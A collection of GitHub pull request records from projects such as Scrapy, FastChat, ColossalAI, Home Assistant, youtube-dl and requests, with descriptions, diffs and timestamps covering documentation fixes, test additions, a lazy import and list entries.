Add a new algorithm for verify if a number is an Armstrong. * [x] Add an algorithm? * [ ] Fix a bug or typo in an existing algorithm? * [x] Documentation change? ### **Checklist:** * [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md). * [x] This pull request is all my own work -- I have not plagiarized. * [x] I know that pull requests will not be merged if they fail the automated tests. * [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms. * [ ] All new Python files are placed inside an existing directory. * [ ] All filenames are in all lowercase characters with no spaces or dashes. * [x] All functions and variable names follow Python naming conventions. * [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html). * [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing. * [ ] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation. * [ ] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
https://api.github.com/repos/TheAlgorithms/Python/pulls/4474
2021-06-02T14:21:04Z
2021-06-04T20:28:26Z
2021-06-04T20:28:26Z
2021-06-05T01:07:13Z
1,082
TheAlgorithms/Python
29,666
[MRG+1] Updated architecture graph for organization/clarity
diff --git a/docs/topics/_images/scrapy_architecture_02.png b/docs/topics/_images/scrapy_architecture_02.png new file mode 100644 index 00000000000..80be02078a1 Binary files /dev/null and b/docs/topics/_images/scrapy_architecture_02.png differ diff --git a/docs/topics/architecture.rst b/docs/topics/architecture.rst index b4588652c5e..ba0e2c61cbc 100644 --- a/docs/topics/architecture.rst +++ b/docs/topics/architecture.rst @@ -16,9 +16,9 @@ components and an outline of the data flow that takes place inside the system below with links for more detailed information about them. The data flow is also described below. -.. image:: _images/scrapy_architecture.png +.. image:: _images/scrapy_architecture_02.png :width: 700 - :height: 494 + :height: 470 :alt: Scrapy architecture Components @@ -99,30 +99,31 @@ Data flow The data flow in Scrapy is controlled by the execution engine, and goes like this: -1. The Engine gets the first URLs to crawl from the Spider and schedules them - in the Scheduler, as Requests. +1. The Engine gets the first URLs to crawl from the Spider. -2. The Engine asks the Scheduler for the next URLs to crawl. +2. The Engine schedules the URLs in the Scheduler as Requests and asks for the + next URLs to crawl. -3. The Scheduler returns the next URLs to crawl to the Engine and the Engine - sends them to the Downloader, passing through the Downloader Middleware - (request direction). +3. The Scheduler returns the next URLs to crawl to the Engine. -4. Once the page finishes downloading the Downloader generates a Response (with +4. The Engine sends the URLs to the Downloader, passing through the + Downloader Middleware (request direction). + +5. Once the page finishes downloading the Downloader generates a Response (with that page) and sends it to the Engine, passing through the Downloader Middleware (response direction). -5. The Engine receives the Response from the Downloader and sends it to the +6. The Engine receives the Response from the Downloader and sends it to the Spider for processing, passing through the Spider Middleware (input direction). -6. The Spider processes the Response and returns scraped items and new Requests - (to follow) to the Engine. +7. The Spider processes the Response and returns scraped items and new Requests + (to follow) to the Engine, passing through the Spider Middleware + (output direction). -7. The Engine passes scraped items and new Requests returned by a spider - through Spider Middleware (output direction), and then sends processed - items to Item Pipelines and processed Requests to the Scheduler. +8. The Engine sends processed items to Item Pipelines and processed Requests to + the Scheduler. -8. The process repeats (from step 1) until there are no more requests from the +9. The process repeats (from step 1) until there are no more requests from the Scheduler. Event-driven networking @@ -143,4 +144,3 @@ links: .. _Introduction to Deferreds in Twisted: https://twistedmatrix.com/documents/current/core/howto/defer-intro.html .. _Twisted - hello, asynchronous programming: http://jessenoller.com/2009/02/11/twisted-hello-asynchronous-programming/ .. _Twisted Introduction - Krondo: http://krondo.com/an-introduction-to-asynchronous-programming-and-twisted/ -
Found the first graph hard to read when first learning about Scrapy architecture. Open to edits!!
https://api.github.com/repos/scrapy/scrapy/pulls/2165
2016-08-04T17:08:42Z
2016-08-06T01:46:28Z
2016-08-06T01:46:28Z
2016-08-06T01:46:28Z
820
scrapy/scrapy
34,884
Lazy import torch in utils.py
diff --git a/fastchat/utils.py b/fastchat/utils.py index 9dce8bafd4..5680ae1127 100644 --- a/fastchat/utils.py +++ b/fastchat/utils.py @@ -12,7 +12,6 @@ import warnings import requests -import torch from fastchat.constants import LOGDIR @@ -122,6 +121,8 @@ def disable_torch_init(): def get_gpu_memory(max_gpus=None): """Get available memory for each GPU.""" + import torch + gpu_memory = [] num_gpus = ( torch.cuda.device_count() @@ -161,6 +162,8 @@ def clean_flant5_ckpt(ckpt_path): Flan-t5 trained with HF+FSDP saves corrupted weights for shared embeddings, Use this function to make sure it can be correctly loaded. """ + import torch + index_file = os.path.join(ckpt_path, "pytorch_model.bin.index.json") index_json = json.load(open(index_file, "r"))
<!-- Thank you for your contribution! --> <!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. --> ## Why are these changes needed? It appears that torch is being used in the `disable_torch_init`, `get_gpu_memory`, and `clean_flant5_ckpt` functions. However as it is declared as a top level import it will also be pulled as a required dependency through the `build_logger` into components that should be able to run without `torch` e.g. the FastChat controller. Using a lazy import on the function level removes this restriction and allows other components to run without `torch`. ## Related issue number (if applicable) Closes #2045 ## Checks - [x] I've run `format.sh` to lint the changes in this PR. - [x] I've included any doc changes needed. - [x] I've made sure the relevant tests are passing (if applicable).
https://api.github.com/repos/lm-sys/FastChat/pulls/2051
2023-07-22T04:53:27Z
2023-07-22T05:26:52Z
2023-07-22T05:26:52Z
2023-07-22T06:34:54Z
227
lm-sys/FastChat
41,286
Adds minor grammar fixes that involve missing commas.
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index aa155969d..63e9188c2 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -20,7 +20,7 @@ your local changes are appropriate to pull back into the original guidelines, pl [Issue](https://github.com/isocpp/CppCoreGuidelines/issues) which can lead to a pull request. - **Maintain the Guidelines** The C++ Core Guidelines were created from a wealth of knowledge spread across a number of organizations worldwide. If you or your organization is passionate about helping to create the guidelines consider becoming an editor or maintainer. If -you're a C++ expert who is serious about participating please +you're a C++ expert who is serious about participating, please [email coreguidelines@isocpp.org](mailto:coreguidelines@isocpp.org?subject=Maintain the C++ Code Guidelines). ## Contributor License Agreement @@ -28,10 +28,10 @@ By contributing content to the C++ Core Guidelines (i.e., submitting a pull requ [Standard C++ Foundation](https://isocpp.org/about) [Terms of Use](https://isocpp.org/home/terms-of-use), especially all of the terms specified regarding Copyright and Patents. - You warrant that your material is original, or you have the right to contribute it. -- With respect to the material that you own, you grant a worldwide non-exclusive irrevocable transferable royalty-free license to your contributed -material to Standard C++ Foundation to display, reproduce, perform, distribute and create derivative works of that material for commercial or +- With respect to the material that you own, you grant a worldwide, non-exclusive, irrevocable, transferable, and royalty-free license to your contributed +material to Standard C++ Foundation to display, reproduce, perform, distribute, and create derivative works of that material for commercial or non-commercial use. With respect to any other material you contribute, such material must be under a license sufficient to allow Standard C++ Foundation -to display, reproduce, perform, distribute and create derivative works of that material for commercial or non-commercial use. +to display, reproduce, perform, distribute, and create derivative works of that material for commercial or non-commercial use. - You agree that, if your contributed material is subsequently reflected in the ISO/IEC C++ standard in any form, it will be subject to all ISO/IEC JTC 1 policies including [copyrights](http://www.iso.org/iso/home/policies.htm), [patents](http://www.iso.org/iso/home/standards_development/governance_of_technical_work/patents.htm), and
https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/535
2016-02-24T20:08:27Z
2016-03-20T16:36:54Z
2016-03-20T16:36:54Z
2016-03-20T16:36:54Z
590
isocpp/CppCoreGuidelines
15,285
[test] fix shardformer tests
diff --git a/tests/test_shardformer/test_model/test_shard_chatglm2.py b/tests/test_shardformer/test_model/test_shard_chatglm2.py index 29d3592bf34e..78d752b69003 100644 --- a/tests/test_shardformer/test_model/test_shard_chatglm2.py +++ b/tests/test_shardformer/test_model/test_shard_chatglm2.py @@ -11,7 +11,6 @@ build_model_from_hybrid_plugin, check_all_grad_tensors, check_loss, - check_output_hidden_state, check_weight, get_grad_tensors_for_check, run_forward_backward_with_hybrid_plugin, @@ -25,7 +24,13 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, ) org_loss, org_output, sharded_loss, sharded_output = run_forward_backward_with_hybrid_plugin( - org_model, sharded_model, sharded_optimizer, data_gen_fn, output_transform_fn, criterion, booster + org_model, + sharded_model, + sharded_optimizer, + data_gen_fn, + output_transform_fn, + criterion, + booster, ) stage_manager = booster.plugin.stage_manager @@ -36,7 +41,10 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, shard_chatglm_model = unwrap_model(sharded_model, "ChatGLMModel", "transformer") norm_layer_for_check = ["encoder.layers[0].input_layernorm"] - row_layer_for_check = ["encoder.layers[0].self_attention.query_key_value", "embedding.word_embeddings"] + row_layer_for_check = [ + "encoder.layers[0].self_attention.query_key_value", + "embedding.word_embeddings", + ] col_layer_for_check = ["encoder.layers[0].self_attention.dense"] # Save gradient tensors for comparison between the original model and the sharded model. @@ -94,8 +102,9 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, else: atol, rtol = 5e-3, 5e-3 - if org_model.__class__.__name__ == "ChatGLMModel": - check_output_hidden_state(org_output, sharded_output, stage_manager, atol=atol, rtol=rtol, dim=1) + # TODO: ChatGLMModel output is [S, B, H], merging batch of pipeline is wrong + # if org_model.__class__.__name__ == "ChatGLMModel": + # check_output_hidden_state(org_output, sharded_output, stage_manager, atol=atol, rtol=rtol, dim=1) check_loss(org_loss, sharded_loss, atol=atol, rtol=rtol) @@ -143,8 +152,20 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, "use_lazy_init": False, "precision": "fp32", }, - {"tp_size": 4, "pp_size": 1, "enable_all_optimization": True, "use_lazy_init": False, "precision": "fp32"}, - {"tp_size": 2, "pp_size": 1, "enable_all_optimization": True, "use_lazy_init": False, "precision": "fp32"}, + { + "tp_size": 4, + "pp_size": 1, + "enable_all_optimization": True, + "use_lazy_init": False, + "precision": "fp32", + }, + { + "tp_size": 2, + "pp_size": 1, + "enable_all_optimization": True, + "use_lazy_init": False, + "precision": "fp32", + }, { "tp_size": 2, "pp_size": 1, @@ -159,7 +180,13 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, def run_chatglm_test(test_config): sub_model_zoo = model_zoo.get_sub_registry("transformers_chatglm") - for name, (model_fn, data_gen_fn, output_transform_fn, loss_fn, _) in sub_model_zoo.items(): + for name, ( + model_fn, + data_gen_fn, + output_transform_fn, + loss_fn, + _, + ) in sub_model_zoo.items(): check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, test_config) clear_layout_converter() @@ -193,7 +220,13 @@ def run_chatglm_test(test_config): def run_chatglm_3d_test(test_config): sub_model_zoo = model_zoo.get_sub_registry("transformers_chatglm") - for name, (model_fn, data_gen_fn, output_transform_fn, loss_fn, _) in sub_model_zoo.items(): + for name, ( + model_fn, + data_gen_fn, + output_transform_fn, + loss_fn, + _, + ) in sub_model_zoo.items(): check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, test_config) clear_layout_converter() @@ -202,13 +235,27 @@ def run_chatglm_3d_test(test_config): def check_chatglm(rank, world_size, port): disable_existing_loggers() - colossalai.launch(config={}, rank=rank, world_size=world_size, host="localhost", port=port, backend="nccl") + colossalai.launch( + config={}, + rank=rank, + world_size=world_size, + host="localhost", + port=port, + backend="nccl", + ) run_chatglm_test() def check_chatglm_3d(rank, world_size, port): disable_existing_loggers() - colossalai.launch(config={}, rank=rank, world_size=world_size, host="localhost", port=port, backend="nccl") + colossalai.launch( + config={}, + rank=rank, + world_size=world_size, + host="localhost", + port=port, + backend="nccl", + ) run_chatglm_3d_test() diff --git a/tests/test_shardformer/test_model/test_shard_t5.py b/tests/test_shardformer/test_model/test_shard_t5.py index 22c201458ad4..9b22d54d7d31 100644 --- a/tests/test_shardformer/test_model/test_shard_t5.py +++ b/tests/test_shardformer/test_model/test_shard_t5.py @@ -25,7 +25,13 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, ) org_loss, org_output, sharded_loss, sharded_output = run_forward_backward_with_hybrid_plugin( - org_model, sharded_model, sharded_optimizer, data_gen_fn, output_transform_fn, criterion, booster + org_model, + sharded_model, + sharded_optimizer, + data_gen_fn, + output_transform_fn, + criterion, + booster, ) stage_manager = booster.plugin.stage_manager @@ -71,7 +77,16 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, else: atol, rtol = 5e-3, 5e-3 if stage_manager is None or stage_manager.is_first_stage(): - check_weight(t5, sharded_t5, row_layer_for_check, tp_group, atol=atol, rtol=rtol, dim=0, verbose=False) + check_weight( + t5, + sharded_t5, + row_layer_for_check, + tp_group, + atol=atol, + rtol=rtol, + dim=0, + verbose=False, + ) # check grads check_all_grad_tensors(grads_to_check) @@ -104,7 +119,7 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, { "tp_size": 4, "pp_size": 1, - "enable_all_optimization": True, + "enable_all_optimization": False, "use_lazy_init": False, "precision": "fp32", }, @@ -117,7 +132,6 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, "use_lazy_init": False, "precision": "fp32", }, - {"tp_size": 2, "pp_size": 1, "enable_all_optimization": True, "use_lazy_init": False, "precision": "fp32"}, { "tp_size": 2, "pp_size": 1, @@ -144,7 +158,13 @@ def check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, def run_t5_test(test_config): sub_model_zoo = model_zoo.get_sub_registry("transformers_t5") - for name, (model_fn, data_gen_fn, output_transform_fn, loss_fn, _) in sub_model_zoo.items(): + for name, ( + model_fn, + data_gen_fn, + output_transform_fn, + loss_fn, + _, + ) in sub_model_zoo.items(): # skip 4-stage pp test for t5_encoder if test_config["pp_size"] > 2 and name == "transformers_t5_encoder_model": continue @@ -185,7 +205,13 @@ def run_t5_test(test_config): def run_t5_3d_test(test_config): sub_model_zoo = model_zoo.get_sub_registry("transformers_t5") - for name, (model_fn, data_gen_fn, output_transform_fn, loss_fn, _) in sub_model_zoo.items(): + for name, ( + model_fn, + data_gen_fn, + output_transform_fn, + loss_fn, + _, + ) in sub_model_zoo.items(): check_forward_backward(model_fn, data_gen_fn, output_transform_fn, loss_fn, test_config) clear_layout_converter() @@ -194,13 +220,27 @@ def run_t5_3d_test(test_config): def check_t5(rank, world_size, port): disable_existing_loggers() - colossalai.launch(config={}, rank=rank, world_size=world_size, host="localhost", port=port, backend="nccl") + colossalai.launch( + config={}, + rank=rank, + world_size=world_size, + host="localhost", + port=port, + backend="nccl", + ) run_t5_test() def check_t5_3d(rank, world_size, port): disable_existing_loggers() - colossalai.launch(config={}, rank=rank, world_size=world_size, host="localhost", port=port, backend="nccl") + colossalai.launch( + config={}, + rank=rank, + world_size=world_size, + host="localhost", + port=port, + backend="nccl", + ) run_t5_3d_test()
## 📌 Checklist before creating the PR - [ ] I have created an issue for this PR for traceability - [ ] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description` - [ ] I have added relevant tags if possible for us to better distinguish different PRs ## 🚨 Issue number > Link this PR to your issue with words like fixed to automatically close the linked issue upon merge > > e.g. `fixed #1234`, `closed #1234`, `resolved #1234` ## 📝 What does this PR do? > Summarize your work here. > if you have any plots/diagrams/screenshots/tables, please attach them here. ## 💥 Checklist before requesting a review - [ ] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue)) - [ ] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible - [ ] I have performed a self-review of my code - [ ] I have added thorough tests. - [ ] I have added docstrings for all the functions/methods I implemented ## ⭐️ Do you enjoy contributing to Colossal-AI? - [ ] 🌝 Yes, I do. - [ ] 🌚 No, I don't. Tell us more if you don't enjoy contributing to Colossal-AI.
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/5514
2024-03-26T09:26:45Z
2024-03-27T02:17:17Z
2024-03-27T02:17:17Z
2024-03-27T02:17:20Z
2,510
hpcaitech/ColossalAI
11,443
Add additional coverage for ESPHome sensor and number
diff --git a/.coveragerc b/.coveragerc index 70d9fd5e0e243e..984adba59f74fd 100644 --- a/.coveragerc +++ b/.coveragerc @@ -312,7 +312,6 @@ omit = homeassistant/components/esphome/domain_data.py homeassistant/components/esphome/entry_data.py homeassistant/components/esphome/light.py - homeassistant/components/esphome/number.py homeassistant/components/esphome/switch.py homeassistant/components/etherscan/sensor.py homeassistant/components/eufy/* diff --git a/homeassistant/components/esphome/number.py b/homeassistant/components/esphome/number.py index e876fe412f6e2b..4e3d052e6ef06a 100644 --- a/homeassistant/components/esphome/number.py +++ b/homeassistant/components/esphome/number.py @@ -74,9 +74,7 @@ def _on_static_info_update(self, static_info: EntityInfo) -> None: def native_value(self) -> float | None: """Return the state of the entity.""" state = self._state - if math.isnan(state.state): - return None - if state.missing_state: + if state.missing_state or math.isnan(state.state): return None return state.state diff --git a/tests/components/esphome/test_number.py b/tests/components/esphome/test_number.py new file mode 100644 index 00000000000000..8157c5f5c3d824 --- /dev/null +++ b/tests/components/esphome/test_number.py @@ -0,0 +1,91 @@ +"""Test ESPHome numbers.""" + +import math +from unittest.mock import call + +from aioesphomeapi import ( + APIClient, + NumberInfo, + NumberMode as ESPHomeNumberMode, + NumberState, +) + +from homeassistant.components.number import ( + ATTR_VALUE, + DOMAIN as NUMBER_DOMAIN, + SERVICE_SET_VALUE, +) +from homeassistant.const import ATTR_ENTITY_ID, STATE_UNKNOWN +from homeassistant.core import HomeAssistant + + +async def test_generic_number_entity( + hass: HomeAssistant, + mock_client: APIClient, + mock_generic_device_entry, +) -> None: + """Test a generic number entity.""" + entity_info = [ + NumberInfo( + object_id="mynumber", + key=1, + name="my number", + unique_id="my_number", + max_value=100, + min_value=0, + step=1, + unit_of_measurement="%", + ) + ] + states = [NumberState(key=1, state=50)] + user_service = [] + await mock_generic_device_entry( + mock_client=mock_client, + entity_info=entity_info, + user_service=user_service, + states=states, + ) + state = hass.states.get("number.test_my_number") + assert state is not None + assert state.state == "50" + + await hass.services.async_call( + NUMBER_DOMAIN, + SERVICE_SET_VALUE, + {ATTR_ENTITY_ID: "number.test_my_number", ATTR_VALUE: 50}, + blocking=True, + ) + mock_client.number_command.assert_has_calls([call(1, 50)]) + mock_client.number_command.reset_mock() + + +async def test_generic_number_nan( + hass: HomeAssistant, + mock_client: APIClient, + mock_generic_device_entry, +) -> None: + """Test a generic number entity with nan state.""" + entity_info = [ + NumberInfo( + object_id="mynumber", + key=1, + name="my number", + unique_id="my_number", + max_value=100, + min_value=0, + step=1, + unit_of_measurement="%", + mode=ESPHomeNumberMode.SLIDER, + ) + ] + states = [NumberState(key=1, state=math.nan)] + user_service = [] + await mock_generic_device_entry( + mock_client=mock_client, + entity_info=entity_info, + user_service=user_service, + states=states, + ) + state = hass.states.get("number.test_my_number") + assert state is not None + assert state.state == STATE_UNKNOWN diff --git a/tests/components/esphome/test_sensor.py b/tests/components/esphome/test_sensor.py index 5517198341aa36..8f4eb0f95139c8 100644 --- a/tests/components/esphome/test_sensor.py +++ b/tests/components/esphome/test_sensor.py @@ -1,6 +1,9 @@ """Test ESPHome sensors.""" +import math + from aioesphomeapi import ( APIClient, + EntityCategory as ESPHomeEntityCategory, LastResetType, SensorInfo, SensorState, @@ -10,8 +13,10 @@ ) from homeassistant.components.sensor import ATTR_STATE_CLASS, SensorStateClass -from homeassistant.const import STATE_UNKNOWN +from homeassistant.const import ATTR_ICON, STATE_UNKNOWN from homeassistant.core import HomeAssistant +from homeassistant.helpers import entity_registry as er +from homeassistant.helpers.entity import EntityCategory async def test_generic_numeric_sensor( @@ -41,6 +46,41 @@ async def test_generic_numeric_sensor( assert state.state == "50" +async def test_generic_numeric_sensor_with_entity_category_and_icon( + hass: HomeAssistant, + mock_client: APIClient, + mock_generic_device_entry, +) -> None: + """Test a generic sensor entity.""" + entity_info = [ + SensorInfo( + object_id="mysensor", + key=1, + name="my sensor", + unique_id="my_sensor", + entity_category=ESPHomeEntityCategory.CONFIG, + icon="mdi:leaf", + ) + ] + states = [SensorState(key=1, state=50)] + user_service = [] + await mock_generic_device_entry( + mock_client=mock_client, + entity_info=entity_info, + user_service=user_service, + states=states, + ) + state = hass.states.get("sensor.test_my_sensor") + assert state is not None + assert state.state == "50" + assert state.attributes[ATTR_ICON] == "mdi:leaf" + entity_reg = er.async_get(hass) + entry = entity_reg.async_get("sensor.test_my_sensor") + assert entry is not None + assert entry.unique_id == "my_sensor" + assert entry.entity_category is EntityCategory.CONFIG + + async def test_generic_numeric_sensor_state_class_measurement( hass: HomeAssistant, mock_client: APIClient, @@ -70,6 +110,11 @@ async def test_generic_numeric_sensor_state_class_measurement( assert state is not None assert state.state == "50" assert state.attributes[ATTR_STATE_CLASS] == SensorStateClass.MEASUREMENT + entity_reg = er.async_get(hass) + entry = entity_reg.async_get("sensor.test_my_sensor") + assert entry is not None + assert entry.unique_id == "my_sensor" + assert entry.entity_category is None async def test_generic_numeric_sensor_device_class_timestamp( @@ -130,6 +175,56 @@ async def test_generic_numeric_sensor_legacy_last_reset_convert( assert state.attributes[ATTR_STATE_CLASS] == SensorStateClass.TOTAL_INCREASING +async def test_generic_numeric_sensor_no_state( + hass: HomeAssistant, mock_client: APIClient, mock_generic_device_entry +) -> None: + """Test a generic numeric sensor that has no state.""" + entity_info = [ + SensorInfo( + object_id="mysensor", + key=1, + name="my sensor", + unique_id="my_sensor", + ) + ] + states = [] + user_service = [] + await mock_generic_device_entry( + mock_client=mock_client, + entity_info=entity_info, + user_service=user_service, + states=states, + ) + state = hass.states.get("sensor.test_my_sensor") + assert state is not None + assert state.state == STATE_UNKNOWN + + +async def test_generic_numeric_sensor_nan_state( + hass: HomeAssistant, mock_client: APIClient, mock_generic_device_entry +) -> None: + """Test a generic numeric sensor that has nan state.""" + entity_info = [ + SensorInfo( + object_id="mysensor", + key=1, + name="my sensor", + unique_id="my_sensor", + ) + ] + states = [SensorState(key=1, state=math.nan, missing_state=False)] + user_service = [] + await mock_generic_device_entry( + mock_client=mock_client, + entity_info=entity_info, + user_service=user_service, + states=states, + ) + state = hass.states.get("sensor.test_my_sensor") + assert state is not None + assert state.state == STATE_UNKNOWN + + async def test_generic_numeric_sensor_missing_state( hass: HomeAssistant, mock_client: APIClient, mock_generic_device_entry ) -> None:
## Proposed change <!-- Describe the big picture of your changes here to communicate to the maintainers why we should accept this pull request. If it fixes a bug or resolves a feature request, be sure to link to that issue in the additional information section. --> Add additional coverage for ESPHome `entity.py` via `sensor/number` ## Type of change <!-- What type of change does your PR introduce to Home Assistant? NOTE: Please, check only 1! box! If your PR requires multiple boxes to be checked, you'll most likely need to split it into multiple PRs. This makes things easier and faster to code review. --> - [ ] Dependency upgrade - [ ] Bugfix (non-breaking change which fixes an issue) - [ ] New integration (thank you!) - [ ] New feature (which adds functionality to an existing integration) - [ ] Deprecation (breaking change to happen in the future) - [ ] Breaking change (fix/feature causing existing functionality to break) - [x] Code quality improvements to existing code or addition of tests ## Additional information <!-- Details are important, and help maintainers processing your PR. Please be sure to fill out additional details, if applicable. --> - This PR fixes or closes issue: fixes # - This PR is related to issue: - Link to documentation pull request: ## Checklist <!-- Put an `x` in the boxes that apply. You can also fill these out after creating the PR. If you're unsure about any of them, don't hesitate to ask. We're here to help! This is simply a reminder of what we are going to look for before merging your code. --> - [x] The code change is tested and works locally. - [ ] Local tests pass. **Your PR cannot be merged unless tests pass** - [ ] There is no commented out code in this PR. - [ ] I have followed the [development checklist][dev-checklist] - [ ] I have followed the [perfect PR recommendations][perfect-pr] - [ ] The code has been formatted using Black (`black --fast homeassistant tests`) - [x] Tests have been added to verify that the new code works. If user exposed functionality or configuration variables are added/changed: - [ ] Documentation added/updated for [www.home-assistant.io][docs-repository] If the code communicates with devices, web services, or third-party tools: - [ ] The [manifest file][manifest-docs] has all fields filled out correctly. Updated and included derived files by running: `python3 -m script.hassfest`. - [ ] New or updated dependencies have been added to `requirements_all.txt`. Updated by running `python3 -m script.gen_requirements_all`. - [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description. - [ ] Untested files have been added to `.coveragerc`. <!-- This project is very active and we have a high turnover of pull requests. Unfortunately, the number of incoming pull requests is higher than what our reviewers can review and merge so there is a long backlog of pull requests waiting for review. You can help here! By reviewing another pull request, you will help raise the code quality of that pull request and the final review will be faster. This way the general pace of pull request reviews will go up and your wait time will go down. When picking a pull request to review, try to choose one that hasn't yet been reviewed. Thanks for helping out! --> To help with the load of incoming pull requests: - [ ] I have reviewed two other [open pull requests][prs] in this repository. [prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure <!-- Thank you for contributing <3 Below, some useful links you could explore: --> [dev-checklist]: https://developers.home-assistant.io/docs/development_checklist/ [manifest-docs]: https://developers.home-assistant.io/docs/creating_integration_manifest/ [quality-scale]: https://developers.home-assistant.io/docs/integration_quality_scale_index/ [docs-repository]: https://github.com/home-assistant/home-assistant.io [perfect-pr]: https://developers.home-assistant.io/docs/review-process/#creating-the-perfect-pr
https://api.github.com/repos/home-assistant/core/pulls/95226
2023-06-26T03:48:09Z
2023-06-26T10:29:38Z
2023-06-26T10:29:38Z
2023-06-27T11:18:26Z
2,084
home-assistant/core
38,772
Add m3u8
diff --git a/README.md b/README.md index 0127fa65b..15d34a33b 100644 --- a/README.md +++ b/README.md @@ -286,6 +286,7 @@ A curated list of awesome Python frameworks, libraries and software. Inspired by * [talkbox](http://scikits.appspot.com/talkbox) - A Python library for speech/signal processing. * [TimeSide](https://github.com/yomguy/TimeSide) - Open web audio processing framework. * [tinytag](https://github.com/devsnd/tinytag) - A library for reading music meta data of MP3, OGG, FLAC and Wave files. +* [m3u8](https://github.com/globocom/m3u8) - A module for parsing m3u8 file. ## Video
Add m3u8 to the Audio Section
https://api.github.com/repos/vinta/awesome-python/pulls/188
2014-08-09T03:31:29Z
2014-08-09T07:19:39Z
2014-08-09T07:19:39Z
2014-08-09T07:19:39Z
187
vinta/awesome-python
27,267
[iqiyi] Correct a typo in iqiyi.py
diff --git a/youtube_dl/extractor/iqiyi.py b/youtube_dl/extractor/iqiyi.py index cd11aa70f01..5df674daf14 100644 --- a/youtube_dl/extractor/iqiyi.py +++ b/youtube_dl/extractor/iqiyi.py @@ -150,7 +150,7 @@ def run(self, target, ip, timestamp): elif function in other_functions: other_functions[function]() else: - raise ExtractorError('Unknown funcion %s' % function) + raise ExtractorError('Unknown function %s' % function) return sdk.target
## Please follow the guide below - You will be asked some questions, please read them **carefully** and answer honestly - Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x]) - Use *Preview* tab to see how your *pull request* will actually look like --- ### Before submitting a *pull request* make sure you have: - [x] At least skimmed through [adding new extractor tutorial](https://github.com/ytdl-org/youtube-dl#adding-support-for-a-new-site) and [youtube-dl coding conventions](https://github.com/ytdl-org/youtube-dl#youtube-dl-coding-conventions) sections - [x] [Searched](https://github.com/ytdl-org/youtube-dl/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests - [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) ### In order to be accepted and merged into youtube-dl each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options: - [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/) - [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence) ### What is the purpose of your *pull request*? - [ ] Bug fix - [x] Improvement - [ ] New extractor - [ ] New feature --- ### Description of your *pull request* and other information Correct a simple typo.
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/26884
2020-10-14T15:07:16Z
2020-10-17T16:02:18Z
2020-10-17T16:02:17Z
2020-10-17T20:09:35Z
142
ytdl-org/youtube-dl
49,918
Adding naive-apl
diff --git a/README.md b/README.md index cae88b7f..26826484 100644 --- a/README.md +++ b/README.md @@ -14,6 +14,8 @@ For a list of free machine learning books available for download, go [here](http <!-- MarkdownTOC depth=4 --> +- [APL](#apl) + - [General-Purpose Machine Learning](#apl-general-purpose) - [C](#c) - [General-Purpose Machine Learning](#c-general-purpose) - [Computer Vision](#c-cv) @@ -106,6 +108,13 @@ For a list of free machine learning books available for download, go [here](http <!-- /MarkdownTOC --> +<a name="apl" /> +## APL + +<a name="apl-general-purpose" /> +#### General-Purpose Machine Learning +* [naive-apl](https://github.com/mattcunningham/naive-apl) - Naive Bayesian Classifier implementation in APL + <a name="c" /> ## C
Adding a naive bayesian classifier written in APL
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/280
2016-05-25T13:26:03Z
2016-05-25T13:35:52Z
2016-05-25T13:35:52Z
2016-05-25T13:35:57Z
243
josephmisiti/awesome-machine-learning
52,237
Add a comment about lowercase env. variables precedence over uppercase
diff --git a/requests/utils.py b/requests/utils.py index 3f50d485d9..07f8c7f764 100644 --- a/requests/utils.py +++ b/requests/utils.py @@ -696,6 +696,8 @@ def should_bypass_proxies(url, no_proxy): :rtype: bool """ + # Prioritize lowercase environment variables over uppercase + # to keep a consistent behaviour with other http projects (curl, wget). get_proxy = lambda k: os.environ.get(k) or os.environ.get(k.upper()) # First check whether no_proxy is defined. If it is, check that the URL
As suggested by @sigmavirus24 for the follow-up of issue #4579
https://api.github.com/repos/psf/requests/pulls/4583
2018-04-11T22:59:58Z
2018-05-13T13:15:57Z
2018-05-13T13:15:57Z
2021-09-03T00:11:00Z
147
psf/requests
32,160
P.3: Fixed an inaccurate description of `for (const auto& x : v)`.
